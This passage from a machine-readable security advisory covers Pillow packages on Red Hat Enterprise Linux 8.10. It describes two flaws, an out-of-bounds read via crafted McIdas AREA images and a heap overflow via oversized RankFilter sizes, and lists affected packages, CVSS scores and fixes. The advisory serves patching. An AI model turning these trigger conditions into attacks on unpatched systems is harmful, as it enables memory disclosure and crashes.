"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-devel-0:5.1.1-23.el8_10.ppc64le as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.ppc64le"
},
"product_reference": "python3-pillow-devel-0:5.1.1-23.el8_10.ppc64le",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-devel-0:5.1.1-23.el8_10.s390x as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.s390x"
},
"product_reference": "python3-pillow-devel-0:5.1.1-23.el8_10.s390x",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-devel-0:5.1.1-23.el8_10.x86_64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.x86_64"
},
"product_reference": "python3-pillow-devel-0:5.1.1-23.el8_10.x86_64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-doc-0:5.1.1-23.el8_10.noarch as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-doc-0:5.1.1-23.el8_10.noarch"
},
"product_reference": "python3-pillow-doc-0:5.1.1-23.el8_10.noarch",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-tk-0:5.1.1-23.el8_10.aarch64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.aarch64"
},
"product_reference": "python3-pillow-tk-0:5.1.1-23.el8_10.aarch64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-tk-0:5.1.1-23.el8_10.ppc64le as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.ppc64le"
},
"product_reference": "python3-pillow-tk-0:5.1.1-23.el8_10.ppc64le",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-tk-0:5.1.1-23.el8_10.s390x as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.s390x"
},
"product_reference": "python3-pillow-tk-0:5.1.1-23.el8_10.s390x",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-tk-0:5.1.1-23.el8_10.x86_64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.x86_64"
},
"product_reference": "python3-pillow-tk-0:5.1.1-23.el8_10.x86_64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64"
},
"product_reference": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.i686 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.i686"
},
"product_reference": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.i686",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le"
},
"product_reference": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x"
},
"product_reference": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64"
},
"product_reference": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-54058",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2026-07-14T17:02:34.864708+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500057"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow prior to 12.3.0. When an uncompressed McIdas AREA image is loaded from a filename through the mmap raw codec path, attacker-controlled header words can set a row stride smaller than the natural row width. Pixel access such as Image.tobytes(), getpixel, convert, or save can then read beyond the mapped region, disclosing adjacent process memory or causing a fault.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Memory disclosure or denial of service via crafted McIdas AREA image",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Pillow is vulnerable to an out-of-bounds read when processing a crafted uncompressed McIdas AREA image via the mmap raw codec. A remote attacker who can supply such an image to a service that loads it without user interaction may disclose adjacent process memory or trigger a denial of service. Fixed in Pillow 12.3.0.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-0:5.1.1-23.el8_10.src",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-doc-0:5.1.1-23.el8_10.noarch",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-54058"
},
{
"category": "external",
"summary": "RHBZ#2500057",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500057"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-54058",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54058"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-54058",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54058"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/6a8de891fb00968e5ea79bfa84368ed90b3cfc1d",
"url": "https://github.com/python-pillow/Pillow/commit/6a8de891fb00968e5ea79bfa84368ed90b3cfc1d"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9719",
"url": "https://github.com/python-pillow/Pillow/pull/9719"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-62p4-gmf7-7g93",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-62p4-gmf7-7g93"
}
],
"release_date": "2026-07-14T16:27:38.050000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-29T21:19:12+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-0:5.1.1-23.el8_10.src",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-doc-0:5.1.1-23.el8_10.noarch",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:48021"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-0:5.1.1-23.el8_10.src",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-doc-0:5.1.1-23.el8_10.noarch",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Pillow: Pillow: Memory disclosure or denial of service via crafted McIdas AREA image"
},
{
"cve": "CVE-2026-59197",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-07-14T17:01:29.487456+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500043"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow prior to 12.3.0. The public RankFilter API can trigger a native heap out-of-bounds write when given a very large odd filter size. ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation, and ImagingExpand() computes output dimensions with unchecked signed integer arithmetic. This can lead to denial of service and limited integrity impact via heap corruption.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Native heap out-of-bounds write",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Pillow\u0027s RankFilter API is vulnerable to a native heap out-of-bounds write when a caller supplies a very large odd filter size. Expansion runs before size validation and ImagingExpand uses unchecked signed integer arithmetic for output dimensions. A remote attacker who can drive RankFilter with attacker-controlled sizes may crash the process or corrupt heap memory. Fixed in Pillow 12.3.0.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-0:5.1.1-23.el8_10.src",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
